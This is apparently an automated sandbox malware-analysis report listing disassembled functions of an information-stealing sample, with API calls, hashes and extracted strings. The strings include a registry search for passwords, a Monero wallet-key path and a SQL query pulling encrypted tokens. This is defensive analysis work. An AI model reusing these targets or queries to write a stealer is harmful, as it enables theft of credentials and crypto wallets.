                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: e7a1351df8951a6fb9752cd1fd5554cae1329429607b283f1999fab7be84eb5b
                                  • Instruction ID: e90bb9c497785459fa1d8d9d2810998e65565170604f2399ebea93cab129bf55
                                  • Opcode Fuzzy Hash: e7a1351df8951a6fb9752cd1fd5554cae1329429607b283f1999fab7be84eb5b
                                  • Instruction Fuzzy Hash: 0C318372915209EFCB08EBB9EC99DFF7774BB44302F144218F102A7191DA38AD82DB56
                                  Function 00728100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0122ED88,00000000,?,00730E2C,00000000,?,00000000), ref: 00728130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00728158
                                  • __aulldiv.LIBCMT ref: 00728172
                                  • __aulldiv.LIBCMT ref: 00728180
                                  • wsprintfA.USER32 ref: 007281AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: e1931f91de9f6907469d51f07d28daf8ecfe684b1847d7db06e633f7318ce054
                                  • Instruction ID: 40b84fecf30646a28bd65c0a0f5e6b2ef72ac6e607b23ed6a4cffa285d22ceb1
                                  • Opcode Fuzzy Hash: e1931f91de9f6907469d51f07d28daf8ecfe684b1847d7db06e633f7318ce054
                                  • Instruction Fuzzy Hash: 6C211FB1D44318ABDB10DFD5DC49FAEB7B8FB44711F104609F605BB280D77969018BA9
                                  Function 007160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                  • InternetOpenA.WININET(00730DF7,00000001,00000000,00000000,00000000), ref: 0071610F
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0071618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007161B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 007161DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0071620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00716249
                                  • InternetCloseHandle.WININET(?), ref: 00716253
                                  • InternetCloseHandle.WININET(00000000), ref: 00716260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 5ff596219b57bdca0a405a4304e85234e488dbb91fce613ab49c24102b7f1767
                                  • Instruction ID: 38a8bca5eedae2df3eccedb141d2e2051d83ed5251d17b1adc65815999a1cca0
                                  • Opcode Fuzzy Hash: 5ff596219b57bdca0a405a4304e85234e488dbb91fce613ab49c24102b7f1767
                                  • Instruction Fuzzy Hash: B7518EB1A10218ABDB20DFA4DC49BEE77B8FB08701F108198F605A71C1DB786A85DF95
                                  Function 007172D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0071733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007173B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0071740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00717452
                                  • HeapFree.KERNEL32(00000000), ref: 00717459
                                  • task.LIBCPMTD ref: 00717555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 5b3f5a08d3de66baa8c142dc33cab27fcca14e8aa2a3992401be743d64625225
                                  • Instruction ID: ead7f364c7c80617118cb2c38fe77778abefe15ceeedc7da261a371c0e847150
                                  • Opcode Fuzzy Hash: 5b3f5a08d3de66baa8c142dc33cab27fcca14e8aa2a3992401be743d64625225
                                  • Instruction Fuzzy Hash: 92614BB5D0426CDBDB24DB54CC55BD9B7B8BF48300F0081E9E689A6181EB785BC9CFA1
                                  Function 0071BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0071BC9F
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0071BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0071BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0071BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 95538b754b327f8bb6a43dab39fe64b73ef3fd95fb46c2a2c653f8a7521149cc
                                  • Instruction ID: 135aea18615e46178418cde479142cf030087be40cbad7ea44326f3a0b8e5c63
                                  • Opcode Fuzzy Hash: 95538b754b327f8bb6a43dab39fe64b73ef3fd95fb46c2a2c653f8a7521149cc
                                  • Instruction Fuzzy Hash: 19B13571910218EBDB05FBA0ED5AEEE7378FF54300F404568F506A6192EF386E49CB66
                                  Function 00726770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 0d2f72125b73b8c3522914786a3d91f6386ca6393f461d7e413abc153babd917
                                  • Instruction ID: 2cb3c46b59346129071556d2d59a215285b13c604f0354a4cd741a23bafaf9e2
                                  • Opcode Fuzzy Hash: 0d2f72125b73b8c3522914786a3d91f6386ca6393f461d7e413abc153babd917
                                  • Instruction Fuzzy Hash: 1DF05E30D18319EFD3449FE2E909B2C7F70FB08703F040299E60986390D6744B41AB9A
                                  Function 00714FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00714FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00714FD1
                                  • InternetOpenA.WININET(00730DDF,00000000,00000000,00000000,00000000), ref: 00714FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00715011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00715041
                                  • InternetCloseHandle.WININET(?), ref: 007150B9
                                  • InternetCloseHandle.WININET(?), ref: 007150C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8b0123902350963bc1b004cdde4e7d199652461cdf55555a85c99c7a56f50676
                                  • Instruction ID: cd36c160b8d4aeaa40f9061b496b34e61016b76ccd418754a594ca4701f76684
                                  • Opcode Fuzzy Hash: 8b0123902350963bc1b004cdde4e7d199652461cdf55555a85c99c7a56f50676
                                  • Instruction Fuzzy Hash: 2D3105B4A00218EBDB24CF94DC85BDCB7B4EB48705F1081D8EB09A7281D7746EC59F99
                                  Function 007283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00728426
                                  • wsprintfA.USER32 ref: 00728459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0072847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728499
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0122EDB8,00000000,000F003F,?,00000400), ref: 007284EC
                                  • lstrlen.KERNEL32(?), ref: 00728501
                                  • RegQueryValueExA.ADVAPI32(00000000,0122ED58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00730B34), ref: 00728599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: f55c00106ec5a23a6b9043ec7a09e6ec6143b7a35dc5672cd459ff753a5ad046
                                  • Instruction ID: 65de0dc1117f99b2493a35e80bc329161d05e30e2ec49943dcf924f9495fbacc
                                  • Opcode Fuzzy Hash: f55c00106ec5a23a6b9043ec7a09e6ec6143b7a35dc5672cd459ff753a5ad046
                                  • Instruction Fuzzy Hash: 792139B191022CABDB64DB54DC85FE9B3B8FB48701F00C2D8E609A6140DF756A81CFD5
                                  Function 00727690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007276A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007276AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC00,00000000,00020119,00000000), ref: 007276DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0122ECC8,00000000,00000000,?,000000FF), ref: 007276FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00727708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: c476b168452c96b8f9ba37299a7381ff5469806b1193fdcaca811ce6404b56f6
                                  • Instruction ID: a9a2c0983ff169a27b0ffbada48632ea581065c097b152d87ee07d39f557e993
                                  • Opcode Fuzzy Hash: c476b168452c96b8f9ba37299a7381ff5469806b1193fdcaca811ce6404b56f6
                                  • Instruction Fuzzy Hash: 8301A2B4A18308BFE700DBE2ED49F6DB7B8EB08702F004154FB04D7290E6749900DB55
                                  Function 00727720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0072773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC00,00000000,00020119,007276B9), ref: 0072775B
                                  • RegQueryValueExA.ADVAPI32(007276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0072777A
                                  • RegCloseKey.ADVAPI32(007276B9), ref: 00727784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 437aaf5ed29e716a454f38598248f93d305f7aba3f29cda8e24f758a359a866e
                                  • Instruction ID: c3ef3e6069661c0ab6562acfe08d76abfb267678e5c26ca858498e9511b3c992
                                  • Opcode Fuzzy Hash: 437aaf5ed29e716a454f38598248f93d305f7aba3f29cda8e24f758a359a866e
                                  • Instruction Fuzzy Hash: 710144B5A54308BFD700DBE5DC49FAEB7B8EB48701F004254FA05A7281D67455009B95
